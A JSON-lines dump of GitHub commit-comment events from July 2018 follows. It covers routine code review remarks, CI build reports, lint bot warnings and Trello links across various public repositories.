{"id":"7953078481","type":"CommitCommentEvent","actor":{"login":"gleckler1"},"repo":{"name":"PCMDI/pcmdi_metrics"},"payload":{"comment":{"id":29678220,"position":null,"line":null,"path":null,"commit_id":"02fd8c28b9b8c9332933a30efcb96cb209ed2029","created_at":"2018-07-11T23:14:44Z","updated_at":"2018-07-11T23:14:44Z","author_association":"CONTRIBUTOR","body":"@lee1043 @doutriaux1   Ah well its only under devel, but Charles can teach us how to revert.  Otherwise you can save this to the intended branch and then directly delete this from master.... fingers crossed!\r\n"}},"created_at":"2018-07-11T23:14:44Z"}
{"id":"7953080242","type":"CommitCommentEvent","actor":{"login":"RS30"},"repo":{"name":"RS30/Ross-Hello-world"},"payload":{"comment":{"id":29678228,"position":null,"line":null,"path":null,"commit_id":"7cdec20000f7dc700ec9703c75a0d241cfd5bb60","created_at":"2018-07-11T23:15:19Z","updated_at":"2018-07-11T23:15:19Z","author_association":"OWNER","body":"this is a test 1"}},"created_at":"2018-07-11T23:15:19Z"}
{"id":"7953081681","type":"CommitCommentEvent","actor":{"login":"RS30"},"repo":{"name":"RS30/Ross-Hello-world"},"payload":{"comment":{"id":29678231,"position":null,"line":null,"path":null,"commit_id":"7cdec20000f7dc700ec9703c75a0d241cfd5bb60","created_at":"2018-07-11T23:15:45Z","updated_at":"2018-07-11T23:15:45Z","author_association":"OWNER","body":"this is a test 2 for this project"}},"created_at":"2018-07-11T23:15:45Z"}
{"id":"7953083020","type":"CommitCommentEvent","actor":{"login":"taylor13"},"repo":{"name":"PCMDI/cmip6-cmor-tables"},"payload":{"comment":{"id":29678236,"position":null,"line":null,"path":null,"commit_id":"56a700d15b2f9b3f256f3959fe766774d69635c4","created_at":"2018-07-11T23:16:12Z","updated_at":"2018-07-11T23:16:12Z","author_association":"NONE","body":"I think this should now be \"gridlatitude\", not grid_latitude, but not sure about this.\r\n"}},"created_at":"2018-07-11T23:16:12Z"}
{"id":"7953086288","type":"CommitCommentEvent","actor":{"login":"DanielTakeshi"},"repo":{"name":"DanielTakeshi/fast_grasp_detect"},"payload":{"comment":{"id":29678243,"position":null,"line":null,"path":null,"commit_id":"8eccedb5e3172df931eaa1f87e186fd5b05d23fc","created_at":"2018-07-11T23:17:19Z","updated_at":"2018-07-11T23:17:19Z","author_association":"OWNER","body":"Oh, I don't notice much of a difference between fixing the first 26 layers vs fine-tuning by starting with the first 26 but training those in addition to the last ones..."}},"created_at":"2018-07-11T23:17:19Z"}
{"id":"7953088134","type":"CommitCommentEvent","actor":{"login":"mpatel-402455"},"repo":{"name":"mpatel-402455/Citrix-Scripts"},"payload":{"comment":{"id":29678246,"position":null,"line":null,"path":null,"commit_id":"182856520d17abc4789bd32118c06c6005cacc1b","created_at":"2018-07-11T23:18:00Z","updated_at":"2018-07-11T23:18:00Z","author_association":"OWNER","body":"Citrix Related Scripts "}},"created_at":"2018-07-11T23:18:00Z"}
{"id":"7953089324","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-ship-holding"},"payload":{"comment":{"id":29678250,"position":null,"line":null,"path":null,"commit_id":"27d08ca6367a59f28785e847b21f0974bcb5854a","created_at":"2018-07-11T23:18:23Z","updated_at":"2018-07-11T23:18:23Z","author_association":"CONTRIBUTOR","body":"@Zimzams ahead of the game with learning the tradition of spelling your commits with *character*"}},"created_at":"2018-07-11T23:18:23Z"}
{"id":"7953091614","type":"CommitCommentEvent","actor":{"login":"lee1043"},"repo":{"name":"PCMDI/pcmdi_metrics"},"payload":{"comment":{"id":29678253,"position":null,"line":null,"path":null,"commit_id":"02fd8c28b9b8c9332933a30efcb96cb209ed2029","created_at":"2018-07-11T23:19:14Z","updated_at":"2018-07-11T23:19:14Z","author_association":"CONTRIBUTOR","body":"@gleckler1 @doutriaux1 deleted accidentally uploaded file from master... sorry for that happened. By the way can we disable push to master but allow only pull request to prevent this kind of mistake?"}},"created_at":"2018-07-11T23:19:14Z"}
{"id":"7953092959","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"remilia15/android_hardware_sprd"},"payload":{"comment":{"id":29678256,"position":null,"line":null,"path":null,"commit_id":"847a5b79629c0d36076cc0f8a953cd0a495a4167","created_at":"2018-07-11T23:19:40Z","updated_at":"2018-07-11T23:19:40Z","author_association":"CONTRIBUTOR","body":"Need this commint: https://github.com/ngoquang2708/android_vendor_samsung_vivalto3gvn/commit/8c7eef55aed13d7e2e547dd51932307154897075."}},"created_at":"2018-07-11T23:19:40Z"}
{"id":"7953093024","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29678257,"position":null,"line":null,"path":null,"commit_id":"154d8f3f95487d2ed2353e303c28d4e5b3b885c0","created_at":"2018-07-11T23:19:42Z","updated_at":"2018-07-11T23:19:42Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T23:19:42Z"}
{"id":"7953096969","type":"CommitCommentEvent","actor":{"login":"JanMiksovsky"},"repo":{"name":"elix/elix"},"payload":{"comment":{"id":29678262,"position":null,"line":null,"path":null,"commit_id":"a8aa4939500e845ed6544c4aa3a179ab321044b1","created_at":"2018-07-11T23:21:03Z","updated_at":"2018-07-11T23:21:03Z","author_association":"MEMBER","body":"That'd be awesome, thanks."}},"created_at":"2018-07-11T23:21:03Z"}
{"id":"7953097936","type":"CommitCommentEvent","actor":{"login":"gacra"},"repo":{"name":"gacra/Recomendador-Educacional"},"payload":{"comment":{"id":29678264,"position":null,"line":null,"path":null,"commit_id":"249d231e42d8a235fa93e0be0eb4b0781b1601f2","created_at":"2018-07-11T23:21:22Z","updated_at":"2018-07-11T23:21:22Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatorar para Material UI](https://trello.com/c/b5N2QbuZ/50-refatorar-para-material-ui)"}},"created_at":"2018-07-11T23:21:22Z"}
{"id":"7953098777","type":"CommitCommentEvent","actor":{"login":"gacra"},"repo":{"name":"gacra/Recomendador-Educacional"},"payload":{"comment":{"id":29678266,"position":null,"line":null,"path":null,"commit_id":"69dd5abe848c05c45fe11738ee8a9142f0795ba2","created_at":"2018-07-11T23:21:39Z","updated_at":"2018-07-11T23:21:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[FrontEnd][Recomendação] Fazer tela das recomendações](https://trello.com/c/vR4RI2SU/31-frontendrecomenda%C3%A7%C3%A3o-fazer-tela-das-recomenda%C3%A7%C3%B5es)"}},"created_at":"2018-07-11T23:21:39Z"}
{"id":"7953099063","type":"CommitCommentEvent","actor":{"login":"gacra"},"repo":{"name":"gacra/Recomendador-Educacional"},"payload":{"comment":{"id":29678267,"position":null,"line":null,"path":null,"commit_id":"eccfedbf192d36fa2762f3a490e428afdecfd122","created_at":"2018-07-11T23:21:45Z","updated_at":"2018-07-11T23:21:45Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[FrontEnd][Recomendação] Fazer tela das recomendações](https://trello.com/c/vR4RI2SU/31-frontendrecomenda%C3%A7%C3%A3o-fazer-tela-das-recomenda%C3%A7%C3%B5es)"}},"created_at":"2018-07-11T23:21:45Z"}
{"id":"7953099435","type":"CommitCommentEvent","actor":{"login":"gacra"},"repo":{"name":"gacra/Recomendador-Educacional"},"payload":{"comment":{"id":29678268,"position":null,"line":null,"path":null,"commit_id":"eccfedbf192d36fa2762f3a490e428afdecfd122","created_at":"2018-07-11T23:21:53Z","updated_at":"2018-07-11T23:21:53Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Usar preloader para aguardar dados sendo carregados](https://trello.com/c/f5Nz0plj/49-usar-preloader-para-aguardar-dados-sendo-carregados)"}},"created_at":"2018-07-11T23:21:53Z"}
{"id":"7953099721","type":"CommitCommentEvent","actor":{"login":"gacra"},"repo":{"name":"gacra/Recomendador-Educacional"},"payload":{"comment":{"id":29678269,"position":null,"line":null,"path":null,"commit_id":"008be06b217860239ffae96ce588da4da6aadb40","created_at":"2018-07-11T23:21:59Z","updated_at":"2018-07-11T23:21:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Usar preloader para aguardar dados sendo carregados](https://trello.com/c/f5Nz0plj/49-usar-preloader-para-aguardar-dados-sendo-carregados)"}},"created_at":"2018-07-11T23:21:59Z"}
{"id":"7953105083","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29678281,"position":5,"line":null,"path":"internal/handlers/admin/admin.go","commit_id":"512499670d30f594609a02a856bf63bd0c15a853","created_at":"2018-07-11T23:23:50Z","updated_at":"2018-07-11T23:23:50Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/internal/bot (cannot find package \"github.com/disiqueira/ultraslackbot/internal/bot\" in any of:"}},"created_at":"2018-07-11T23:23:50Z"}
{"id":"7953105096","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29678282,"position":7,"line":null,"path":"internal/handlers/logger/logger.go","commit_id":"512499670d30f594609a02a856bf63bd0c15a853","created_at":"2018-07-11T23:23:50Z","updated_at":"2018-07-11T23:23:50Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/internal/bot (cannot find package \"github.com/disiqueira/ultraslackbot/internal/bot\" in any of:"}},"created_at":"2018-07-11T23:23:50Z"}
{"id":"7953105109","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29678283,"position":8,"line":null,"path":"internal/handlers/logger/logger.go","commit_id":"512499670d30f594609a02a856bf63bd0c15a853","created_at":"2018-07-11T23:23:50Z","updated_at":"2018-07-11T23:23:50Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/slack (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/slack\" in any of:"}},"created_at":"2018-07-11T23:23:50Z"}
{"id":"7953105122","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29678284,"position":9,"line":null,"path":"internal/handlers/logger/logger.go","commit_id":"512499670d30f594609a02a856bf63bd0c15a853","created_at":"2018-07-11T23:23:51Z","updated_at":"2018-07-11T23:23:51Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/internal/context (cannot find package \"github.com/disiqueira/ultraslackbot/internal/context\" in any of:"}},"created_at":"2018-07-11T23:23:51Z"}
{"id":"7953105143","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29678285,"position":9,"line":null,"path":"internal/handlers/command/command.go","commit_id":"512499670d30f594609a02a856bf63bd0c15a853","created_at":"2018-07-11T23:23:51Z","updated_at":"2018-07-11T23:23:51Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/internal/bot (cannot find package \"github.com/disiqueira/ultraslackbot/internal/bot\" in any of:"}},"created_at":"2018-07-11T23:23:51Z"}
{"id":"7953105153","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29678286,"position":10,"line":null,"path":"internal/handlers/command/command.go","commit_id":"512499670d30f594609a02a856bf63bd0c15a853","created_at":"2018-07-11T23:23:51Z","updated_at":"2018-07-11T23:23:51Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/slack (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/slack\" in any of:"}},"created_at":"2018-07-11T23:23:51Z"}
{"id":"7953105161","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29678287,"position":11,"line":null,"path":"internal/handlers/command/command.go","commit_id":"512499670d30f594609a02a856bf63bd0c15a853","created_at":"2018-07-11T23:23:51Z","updated_at":"2018-07-11T23:23:51Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/internal/context (cannot find package \"github.com/disiqueira/ultraslackbot/internal/context\" in any of:"}},"created_at":"2018-07-11T23:23:51Z"}
{"id":"7953105177","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29678288,"position":4,"line":null,"path":"pkg/command/google/google.go","commit_id":"512499670d30f594609a02a856bf63bd0c15a853","created_at":"2018-07-11T23:23:52Z","updated_at":"2018-07-11T23:23:52Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/command (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command\" in any of:"}},"created_at":"2018-07-11T23:23:52Z"}
{"id":"7953105189","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29678289,"position":14,"line":null,"path":"internal/app/app.go","commit_id":"512499670d30f594609a02a856bf63bd0c15a853","created_at":"2018-07-11T23:23:52Z","updated_at":"2018-07-11T23:23:52Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/internal/context (cannot find package \"github.com/disiqueira/ultraslackbot/internal/context\" in any of:"}},"created_at":"2018-07-11T23:23:52Z"}
{"id":"7953105220","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29678290,"position":15,"line":null,"path":"internal/app/app.go","commit_id":"512499670d30f594609a02a856bf63bd0c15a853","created_at":"2018-07-11T23:23:52Z","updated_at":"2018-07-11T23:23:52Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/internal/bot (cannot find package \"github.com/disiqueira/ultraslackbot/internal/bot\" in any of:"}},"created_at":"2018-07-11T23:23:52Z"}
{"id":"7953105249","type":"CommitCommentEvent","actor":{"login":"Rodrigoraitz"},"repo":{"name":"Rodrigoraitz/Teste"},"payload":{"comment":{"id":29678291,"position":null,"line":null,"path":null,"commit_id":"20f97137cad38f93322ab4087a4c86ee7f6cf300","created_at":"2018-07-11T23:23:53Z","updated_at":"2018-07-11T23:23:53Z","author_association":"OWNER","body":"Version.02"}},"created_at":"2018-07-11T23:23:53Z"}
{"id":"7953121380","type":"CommitCommentEvent","actor":{"login":"pvint"},"repo":{"name":"pvint/fade9685"},"payload":{"comment":{"id":29678340,"position":null,"line":null,"path":null,"commit_id":"b50665989144af1da0cccf804097a400ff89c1a0","created_at":"2018-07-11T23:29:34Z","updated_at":"2018-07-11T23:29:34Z","author_association":"OWNER","body":"Re #2 \r\n\r\nNote: Argument is unused pending testing."}},"created_at":"2018-07-11T23:29:34Z"}
{"id":"7953129953","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29678356,"position":null,"line":null,"path":null,"commit_id":"04ad2bcff201f0ac5a19d3c6b416c6a54914567e","created_at":"2018-07-11T23:32:25Z","updated_at":"2018-07-11T23:32:25Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (lgu1234) - Win64-Windows-7-VisualStudio-14: OK (2933 of 2934 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 623\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-04ad2bcff201f0ac5a19d3c6b416c6a54914567e-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-04ad2bcff201f0ac5a19d3c6b416c6a54914567e-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T23:32:25Z"}
{"id":"7953131675","type":"CommitCommentEvent","actor":{"login":"yitam"},"repo":{"name":"Microsoft/msphpsql"},"payload":{"comment":{"id":29678362,"position":6,"line":52,"path":"test/functional/pdo_sqlsrv/MsCommon_mid-refactor.inc","commit_id":"0495513c07ce5cdadd0cbf79f7483fe5c76db9b6","created_at":"2018-07-11T23:32:59Z","updated_at":"2018-07-11T23:32:59Z","author_association":"MEMBER","body":"No, it should be `$driver`... \r\nI actually don't know what `$DriverName` is... please check if it's used anywhere. If not, might as well remove it so that we won't be confused."}},"created_at":"2018-07-11T23:32:59Z"}
{"id":"7953135170","type":"CommitCommentEvent","actor":{"login":"jlevy"},"repo":{"name":"jlevy/atom-flowmark"},"payload":{"comment":{"id":29678372,"position":5,"line":242,"path":"tests/testdoc.flowmark.md","commit_id":"a81b14786760ba5e1262cdb753af6fb365c21452","created_at":"2018-07-11T23:34:11Z","updated_at":"2018-07-11T23:34:11Z","author_association":"OWNER","body":"#14 oddly adding a paragraph break here but not below."}},"created_at":"2018-07-11T23:34:11Z"}
{"id":"7953140093","type":"CommitCommentEvent","actor":{"login":"jameshadfield"},"repo":{"name":"nextstrain/augur"},"payload":{"comment":{"id":29678384,"position":null,"line":null,"path":null,"commit_id":"7daa1d84240ca53580fda7e79a4d86ad3975d18f","created_at":"2018-07-11T23:35:54Z","updated_at":"2018-07-11T23:35:54Z","author_association":"MEMBER","body":"Why is flake8 preferred over pylint?"}},"created_at":"2018-07-11T23:35:54Z"}
{"id":"7953142351","type":"CommitCommentEvent","actor":{"login":"sanexto"},"repo":{"name":"sanexto/pagina-web"},"payload":{"comment":{"id":29678393,"position":null,"line":null,"path":null,"commit_id":"970a1bd9ff4e441f078a99c25474563135445a84","created_at":"2018-07-11T23:36:42Z","updated_at":"2018-07-11T23:36:42Z","author_association":"OWNER","body":"Menos mal que te diste cuenta que faltaba esa linea."}},"created_at":"2018-07-11T23:36:42Z"}
{"id":"7953144174","type":"CommitCommentEvent","actor":{"login":"jbenden"},"repo":{"name":"aircrack-ng/aircrack-ng"},"payload":{"comment":{"id":29678396,"position":121,"line":924,"path":"src/airdecap-ng.c","commit_id":"e4426d41ee6ffde4067dbb1e864a9cd2757ae0f0","created_at":"2018-07-11T23:37:21Z","updated_at":"2018-07-11T23:37:21Z","author_association":"COLLABORATOR","body":"Typo."}},"created_at":"2018-07-11T23:37:21Z"}
{"id":"7953144423","type":"CommitCommentEvent","actor":{"login":"Jiede1"},"repo":{"name":"Jiede1/spider-based-on-scrapy_redis-for-share-and-share-prediction-algorithm-search"},"payload":{"comment":{"id":29678398,"position":null,"line":null,"path":null,"commit_id":"37118a9ceac33a0505fcae16b58f57813b90cff5","created_at":"2018-07-11T23:37:27Z","updated_at":"2018-07-11T23:37:27Z","author_association":"OWNER","body":"基于MSD相似度的Kmeans算法"}},"created_at":"2018-07-11T23:37:27Z"}
{"id":"7953144742","type":"CommitCommentEvent","actor":{"login":"songy23"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29678400,"position":6,"line":19,"path":"contrib/zpages/build.gradle","commit_id":"48f9df44957794e14680e7587d4865279b521251","created_at":"2018-07-11T23:37:34Z","updated_at":"2018-07-11T23:37:34Z","author_association":"NONE","body":"Found another possible solution: https://stackoverflow.com/questions/33416293/gradle-to-pack-resources-with-class-files-in-jar and https://github.com/Opalo/stackoverflow/tree/master/33416293.\r\nCan you try change these two lines to:\r\n```\r\njar {\r\n   from('src/') {\r\n      include  '**/*.css'\r\n   }\r\n}\r\n```"}},"created_at":"2018-07-11T23:37:34Z"}
{"id":"7953145080","type":"CommitCommentEvent","actor":{"login":"yitam"},"repo":{"name":"Microsoft/msphpsql"},"payload":{"comment":{"id":29678401,"position":10,"line":14,"path":"test/functional/pdo_sqlsrv/skipif_version_less_than_2k16.inc","commit_id":"0495513c07ce5cdadd0cbf79f7483fe5c76db9b6","created_at":"2018-07-11T23:37:42Z","updated_at":"2018-07-11T23:37:42Z","author_association":"MEMBER","body":"Don't you need the similar checks in this skipif like the 2k14 one? \r\nAzure AD not supported outside Windows until ODBC 17, I think (check the link I sent you earlier)"}},"created_at":"2018-07-11T23:37:42Z"}
{"id":"7953148218","type":"CommitCommentEvent","actor":{"login":"yitam"},"repo":{"name":"Microsoft/msphpsql"},"payload":{"comment":{"id":29678411,"position":13,"line":19,"path":"test/functional/sqlsrv/skipif_version_less_than_2k16.inc","commit_id":"0495513c07ce5cdadd0cbf79f7483fe5c76db9b6","created_at":"2018-07-11T23:38:52Z","updated_at":"2018-07-11T23:38:52Z","author_association":"MEMBER","body":"Same here"}},"created_at":"2018-07-11T23:38:52Z"}
{"id":"7953148385","type":"CommitCommentEvent","actor":{"login":"sanexto"},"repo":{"name":"sanexto/pagina-web"},"payload":{"comment":{"id":29678414,"position":null,"line":null,"path":null,"commit_id":"970a1bd9ff4e441f078a99c25474563135445a84","created_at":"2018-07-11T23:38:55Z","updated_at":"2018-07-11T23:38:55Z","author_association":"OWNER","body":"Yo lo cambiaría por un párrafo, en lugar de encabezado."}},"created_at":"2018-07-11T23:38:55Z"}
{"id":"7953148657","type":"CommitCommentEvent","actor":{"login":"jbenden"},"repo":{"name":"aircrack-ng/aircrack-ng"},"payload":{"comment":{"id":29678415,"position":1,"line":1,"path":"src/avl_tree.c","commit_id":"e4426d41ee6ffde4067dbb1e864a9cd2757ae0f0","created_at":"2018-07-11T23:39:01Z","updated_at":"2018-07-11T23:39:01Z","author_association":"COLLABORATOR","body":"These files are sharable by other tools; please migrate in to the `src/aircrack-util` shared library."}},"created_at":"2018-07-11T23:39:01Z"}
{"id":"7953149709","type":"CommitCommentEvent","actor":{"login":"gacra"},"repo":{"name":"gacra/Recomendador-Educacional"},"payload":{"comment":{"id":29678416,"position":null,"line":null,"path":null,"commit_id":"73cd38303707bfa074910713f2762c77f8be90de","created_at":"2018-07-11T23:39:23Z","updated_at":"2018-07-11T23:39:23Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Usar preloader para aguardar dados sendo carregados](https://trello.com/c/f5Nz0plj/49-usar-preloader-para-aguardar-dados-sendo-carregados)"}},"created_at":"2018-07-11T23:39:23Z"}
{"id":"7953150512","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29678419,"position":null,"line":null,"path":null,"commit_id":"ea01bd1a3400186cdeb0ba889997862a80b2e08f","created_at":"2018-07-11T23:39:39Z","updated_at":"2018-07-11T23:39:39Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2973 of 2973 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea01bd1a3400186cdeb0ba889997862a80b2e08f-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea01bd1a3400186cdeb0ba889997862a80b2e08f-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T23:39:39Z"}
{"id":"7953150523","type":"CommitCommentEvent","actor":{"login":"jbenden"},"repo":{"name":"aircrack-ng/aircrack-ng"},"payload":{"comment":{"id":29678420,"position":null,"line":null,"path":null,"commit_id":"e4426d41ee6ffde4067dbb1e864a9cd2757ae0f0","created_at":"2018-07-11T23:39:40Z","updated_at":"2018-07-11T23:39:40Z","author_association":"COLLABORATOR","body":"Please see code comments. Also, both of the AVL Tree files should be in the util library, so they may be reused correctly..."}},"created_at":"2018-07-11T23:39:40Z"}
{"id":"7953157395","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29678439,"position":null,"line":null,"path":null,"commit_id":"c31e23de8d7f2f21bf99ec3a9b1e057501a0462f","created_at":"2018-07-11T23:42:07Z","updated_at":"2018-07-11T23:42:07Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-MacOS-10.9-clang: OK (2935 of 2935 tests passed, 10 test warnings)\n\nMessages:\n\n * 9 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: Table small diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c31e23de8d7f2f21bf99ec3a9b1e057501a0462f-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c31e23de8d7f2f21bf99ec3a9b1e057501a0462f-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T23:42:07Z"}
{"id":"7953160830","type":"CommitCommentEvent","actor":{"login":"luserx0"},"repo":{"name":"NetBSD/src"},"payload":{"comment":{"id":29678449,"position":null,"line":null,"path":null,"commit_id":"61c296f88a4a6a68bb76e5f179ebf28459b6d1f9","created_at":"2018-07-11T23:43:24Z","updated_at":"2018-07-11T23:43:24Z","author_association":"NONE","body":"\"This change is required to build NetBSD/amd64 with KUBSan.\"\r\nWrong. This is required to build NetBSD with the -fsanitize=undefined compiler option\r\n\r\nAlso:\r\nThe relevant patch in knowledge of you and christos and addressed officially in the tech-kern mailing list\r\nis this: https://github.com/luserx0/NetBSD_GSoC/blob/master/patches/i915_faulty_define_overflow.patch,\r\nmarked June 8th."}},"created_at":"2018-07-11T23:43:24Z"}
{"id":"7953163952","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29678463,"position":null,"line":null,"path":null,"commit_id":"ea01bd1a3400186cdeb0ba889997862a80b2e08f","created_at":"2018-07-11T23:44:32Z","updated_at":"2018-07-11T23:44:32Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea01bd1a3400186cdeb0ba889997862a80b2e08f-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-11T23:44:32Z"}
{"id":"7953165357","type":"CommitCommentEvent","actor":{"login":"Trevelopment"},"repo":{"name":"gartnera/headunit"},"payload":{"comment":{"id":29678471,"position":5,"line":13,"path":"hu/hu_tcp.h","commit_id":"15794ea2290fdad6a3ca5ba5b40d6b01fb90a41a","created_at":"2018-07-11T23:45:06Z","updated_at":"2018-07-11T23:45:06Z","author_association":"COLLABORATOR","body":"this does use the old headunit server method but you can try using wifi direct"}},"created_at":"2018-07-11T23:45:06Z"}
{"id":"7953167870","type":"CommitCommentEvent","actor":{"login":"sanexto"},"repo":{"name":"sanexto/pagina-web"},"payload":{"comment":{"id":29678478,"position":5,"line":9,"path":"index.html","commit_id":"fd3dc6bd0c5ac3119621f80fe9234509c0b756ad","created_at":"2018-07-11T23:45:55Z","updated_at":"2018-07-11T23:45:55Z","author_association":"OWNER","body":"Era un cambio necesario."}},"created_at":"2018-07-11T23:45:55Z"}
{"id":"7953174754","type":"CommitCommentEvent","actor":{"login":"priyankapanda78"},"repo":{"name":"priyankapanda78/priyankapanda78.github.io"},"payload":{"comment":{"id":29678502,"position":null,"line":null,"path":null,"commit_id":"4d00564c5545cfe2353cbd5c04f00622cea1f71a","created_at":"2018-07-11T23:48:26Z","updated_at":"2018-07-11T23:48:26Z","author_association":"OWNER","body":"edited"}},"created_at":"2018-07-11T23:48:26Z"}
{"id":"7953180812","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29678522,"position":null,"line":null,"path":null,"commit_id":"7583f01362872ada86bedbf6b178b60042af4358","created_at":"2018-07-11T23:50:35Z","updated_at":"2018-07-11T23:50:35Z","author_association":"COLLABORATOR","body":"<h3>[docs-theme] fix React import</h3>\n\nPreview: <strong><a href='https://18507-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18507-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18507-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T23:50:35Z"}
